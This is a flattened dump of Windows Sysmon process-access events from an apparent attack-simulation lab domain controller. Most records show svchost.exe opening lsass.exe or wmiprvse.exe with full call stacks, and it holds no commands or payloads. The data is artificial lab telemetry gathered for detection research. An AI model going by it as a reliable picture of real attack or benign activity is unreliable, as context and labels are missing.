12:00:50.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.612{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.612{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.612{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.534{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.534{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.534{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 